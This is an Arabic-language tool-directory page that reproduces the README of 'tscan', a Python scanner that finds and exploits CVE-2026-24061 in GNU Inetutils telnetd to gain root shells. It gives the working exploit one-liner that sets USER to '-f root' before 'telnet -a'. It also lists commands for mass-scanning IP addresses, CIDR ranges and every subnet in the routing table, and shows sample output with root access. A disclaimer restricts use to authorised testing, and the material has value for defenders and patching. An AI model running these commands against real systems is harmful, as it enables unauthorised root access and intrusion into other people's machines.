Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
tscan — # ماسح ضوئي مبني على بايثون يكتشف ويستغل ثغرة تجاوز المصادقة CVE-2026-24061 في خدمة telnetd، مما يتيح الوصول إلى قشرة الجذر (root shell) على خدمات GNU Inetutils الضعيفة. | Kitploit
أدوات/GitHubGitHub/cumakurt/tscan
الاستطلاعماسحات الثغرات الأمنيةمسح المنافذالاستغلالأمن الشبكاتاختبار الاختراقالتعلم والتعليم
GitHubcumakurt/tscan

tscan

# ماسح ضوئي مبني على بايثون يكتشف ويستغل ثغرة تجاوز المصادقة CVE-2026-24061 في خدمة telnetd، مما يتيح الوصول إلى قشرة الجذر (root shell) على خدمات GNU Inetutils الضعيفة.

عرض المستودع
129منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ماسح تجاوز المصادقة Telnetd (CVE-2026-24061)

أداة مبنية بلغة Python لفحص واستغلال ثغرة CVE-2026-24061 في خدمات telnetd الخاصة بـ GNU Inetutils. تقوم هذه الأداة بفحص عناوين IP أو الشبكات بحثًا عن خدمات telnetd الضعيفة التي تسمح بتجاوز المصادقة مما يؤدي إلى الوصول إلى صلاحيات الجذر (root shell).


⚠️ إشعار قانوني مهم وإخلاء مسؤولية

هذا البرنامج مقدم لأغراض تعليمية واختبارات أمنية مصرح بها فقط.

1. الغرض التعليمي

تم تطوير هذا التطبيق لأغراض تعليمية فقط لتوضيح الثغرات الأمنية وللمساعدة في الاختبارات الأمنية والأبحاث المصرح بها.

2. لا يوجد ضمان

هذا البرنامج مقدم "كما هو"، دون أي ضمان من أي نوع، صريح أو ضمني، بما في ذلك على سبيل المثال لا الحصر ضمانات القابلية للتسويق، والملاءمة لغرض معين، وعدم التعدي على الحقوق. لا يضمن المؤلفون والمساهمون أن البرنامج سيكون خاليًا من الأخطاء أو آمنًا أو فعالاً. قد يحتوي البرنامج على أخطاء برمجية أو عيوب أخرى.

3. مسؤولية المستخدم

تقع جميع المسؤولية والتبعات القانونية لاستخدام هذا البرنامج بالكامل على عاتق المستخدم. لا يتحمل المؤلفون أو المساهمون أو الموزعون لهذا البرنامج أي مسؤولية عن أي أضرار أو خسائر أو عواقب قانونية ناتجة عن استخدام أو إساءة استخدام أو عدم القدرة على استخدام هذا البرنامج.

4. حظر الاستخدام غير المصرح به

يجب استخدام هذه الأداة فقط على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وقد يؤدي إلى ملاحقة جنائية.

5. لا توجد ضمانات

لا يضمن المؤلفون عدم:

  • دقة نتائج الفحص
  • أمان التطبيق نفسه
  • التوافق مع جميع الأنظمة
  • خلوّه من الأخطاء البرمجية
  • أي وظيفة أو أداء محدد

باستخدامك لهذا البرنامج، فإنك تقر بأنك قرأت وفهمت ووافقت على الالتزام بهذه الشروط. إذا كنت لا توافق، فلا تستخدم هذا البرنامج.


المطور

تم التطوير بواسطة: Cuma KURT
البريد الإلكتروني: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/

معلومات الثغرة

CVE-2026-24061: تسمح خدمة telnetd الخاصة بـ GNU Inetutils حتى الإصدار 2.7 بتجاوز المصادقة عن بُعد عبر قيمة -f root لمتغير البيئة USER.

درجة CVSS: 9.8 (حرجة)

المرجع: NVD CVE-2026-24061

الميزات

  • 🔍 فحص المنافذ: يكتشف منافذ telnet المفتوحة (الافتراضي: 23، قابل للتخصيص)
  • 🎯 اكتشاف الثغرات: يختبر قابلية استغلال CVE-2026-24061
  • ⚡ متعدد الخيوط: فحص متزامن سريع مع عدد خيوط قابل للتكوين
  • 📁 إدخال مرن: يدعم عناوين IP وشبكات CIDR وملفات قوائم الأهداف
  • 🗺️ اكتشاف تلقائي: اكتشاف وفحص الشبكات الفرعية تلقائيًا من جدول التوجيه
  • 🛑 إيقاف آمن: Ctrl+C يوقف الفحص بأمان ويعرض النتائج الجزئية
  • 📊 تقدم فوري: شريط تقدم مع إحصائيات ونتائج

التثبيت

المتطلبات الأساسية

  • Python 3.6 أو أحدث
  • عميل telnet (مثبت مسبقًا عادةً على Linux/macOS)

تثبيت التبعيات

pip3 install -r requirements.txt

ملاحظة: معظم التبعيات جزء من المكتبة القياسية للغة Python. تعمل الأداة مباشرة مع Python 3.6+.

الاستخدام

الاستخدام الأساسي

# فحص عنوان IP واحد
python3 tscan.py 192.168.1.1

# فحص شبكة CIDR
python3 tscan.py 192.168.1.0/24

# الفحص بمنفذ مخصص
python3 tscan.py -p 2323 192.168.1.1

# فحص أهداف من ملف
python3 tscan.py targets.txt

# فحص عناوين IP متعددة
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1

# فحص شبكات CIDR متعددة
python3 tscan.py 192.168.1.0/24 10.0.0.0/16

ضبط الأداء

# زيادة عدد الخيوط لفحص أسرع (100 خيط)
python3 tscan.py -t 100 192.168.1.0/24

# زيادة المهلة الزمنية للشبكات البطيئة
python3 tscan.py --timeout 10 192.168.1.0/24

# الجمع بين الاثنين لفحص الشبكات الكبيرة
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16

وضع الاكتشاف التلقائي

# اكتشاف وفحص جميع الشبكات الفرعية تلقائيًا من جدول توجيه النظام
python3 tscan.py --auto
# أو باستخدام الصيغة المختصرة:
python3 tscan.py -a

# الاكتشاف التلقائي بمنفذ مخصص
python3 tscan.py --auto -p 2323
# أو:
python3 tscan.py -a -p 2323

# الاكتشاف التلقائي بعدد خيوط مرتفع
python3 tscan.py --auto -t 200
# أو:
python3 tscan.py -a -t 200

ملاحظة: يقرأ وضع --auto جدول توجيه النظام باستخدام أمر ip route list أو route -n ويفحص جميع الشبكات الفرعية المكتشفة تلقائيًا.

أمثلة من الواقع

# مثال 1: فحص سريع للشبكة المحلية
python3 tscan.py 192.168.1.0/24

# مثال 2: فحص سريع بتزامن عالٍ
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16

# مثال 3: فحص منفذ telnet غير قياسي
python3 tscan.py -p 2323 192.168.1.0/24

# مثال 4: اكتشاف وفحص جميع الشبكات الفرعية المحلية تلقائيًا
python3 tscan.py --auto
# أو:
python3 tscan.py -a

# مثال 5: الاكتشاف التلقائي بإعدادات مخصصة
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# أو:
python3 tscan.py -a -p 2323 -t 100 --timeout 8

خيارات سطر الأوامر

positional arguments:
  targets               عنوان (عناوين) IP أو شبكة (شبكات) CIDR أو مسار (مسارات) ملفات تحتوي على الأهداف

options:
  -h, --help            عرض رسالة المساعدة هذه والخروج
  -p, --port PORT       منفذ Telnet للفحص (الافتراضي: 23)
  -t, --threads THREADS عدد الخيوط المتزامنة (الافتراضي: 50)
  --timeout TIMEOUT     مهلة الاتصال بالثواني (الافتراضي: 5)
  -v, --verbose         إخراج تفصيلي
  -a, --auto            اكتشاف وفحص جميع الشبكات الفرعية تلقائيًا من جدول توجيه النظام (route -n أو ip route list)

تنسيق ملف الإدخال

أنشئ ملفًا نصيًا بهدف واحد في كل سطر:

192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16

الأسطر التي تبدأ بـ # تُعتبر تعليقات ويتم تجاهلها.

المخرجات

توفر الأداة:

  1. تقدم فوري: يعرض النتائج فور اكتشافها

    • شريط تقدم مع النسبة المئوية والإحصائيات
    • عدد المضيفين الضعفاء المعروض في شريط التقدم
    • [!] - مضيف ضعيف
    • [~] - المنفذ مفتوح ولكن غير ضعيف
    • الأهداف ذات المنافذ المغلقة يتم تخطيها بصمت
    • Ctrl+C (KeyboardInterrupt): يوقف الفحص بأمان ويعرض النتائج الجزئية فورًا
  2. تقرير الملخص: يتضمن:

    • إجمالي خدمات telnet المكتشفة
    • عدد المضيفين الضعفاء
    • قائمة مفصلة بالمضيفين الضعفاء

مثال على المخرجات

مخرجات الفحص الأساسي

[*] بدء الفحص على 256 هدفًا...
[*] المنفذ: 23، الخيوط: 50، المهلة: 5 ثوانٍ

[*] التقدم: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | مفتوح: 2 | ضعيف: 1
[!] 192.168.1.100:23 - ضعيف
[*] التقدم: [████████████████████████████████████] 100.0% (256/256) | مفتوح: 3 | ضعيف: 1
[+] اكتمل الفحص: تم فحص 256/256 هدفًا

======================================================================
ملخص نتائج الفحص
======================================================================

خدمات telnet المكتشفة: 3
المضيفون الضعفاء: 1

[!] المضيفون الضعفاء:

  ● 192.168.1.100:23
    المخرجات: uid=0(root) gid=0(root) groups=0(root)...

[~] خدمات telnet المكتشفة ولكنها غير ضعيفة:

  ● 192.168.1.101:23
  ● 192.168.1.102:23

[*] اكتمل الفحص في 12.34 ثانية

كيف تعمل

  1. اكتشاف المنفذ: يتحقق مما إذا كان منفذ telnet مفتوحًا على عناوين IP المستهدفة
  2. محاولة الاستغلال: للمنافذ المفتوحة، يحاول استغلال CVE-2026-24061:
    • يضبط متغير البيئة USER="-f root"
    • يتصل عبر أمر telnet -a
    • يرسل أوامر اختبار للتحقق من الوصول إلى صلاحيات الجذر
  3. تصنيف النتائج: يصنف النتائج كضعيفة أو غير ضعيفة

تفاصيل الاستغلال

تسمح الثغرة بتجاوز المصادقة عن طريق ضبط متغير البيئة USER على -f root:

USER="-f root" telnet -a TARGET_IP [PORT]

يؤدي هذا إلى تفسير telnetd لمتغير USER كعلامة (flag)، متجاوزًا المصادقة ومانحًا وصول الجذر.

القيود

  • يتطلب تثبيت عميل telnet
  • يعمل فقط ضد إصدارات telnetd الضعيفة (≤ 2.7)
  • يتطلب وضع الاكتشاف التلقائي أمر ip route list أو route -n

استكشاف الأخطاء وإصلاحها

"telnet command not found"

قم بتثبيت عميل telnet:

# Debian/Ubuntu
sudo apt-get install telnet

# CentOS/RHEL
sudo yum install telnet

# macOS
# مثبت مسبقًا عادةً

لا توجد نتائج

  • تحقق من إمكانية الوصول إلى الأهداف
  • تحقق من قواعد جدار الحماية
  • تأكد من أن خدمات telnet تعمل فعليًا
  • حاول زيادة المهلة الزمنية: --timeout 10

الاستخدام القانوني والأخلاقي

هذه الأداة مخصصة لـ:

  • ✅ اختبار الاختراق المصرح به
  • ✅ البحث الأمني على أنظمتك الخاصة
  • ✅ تقييم الثغرات الأمنية بتفويض مناسب
  • ✅ الأغراض التعليمية في بيئات خاضعة للتحكم
تنزيل الأداة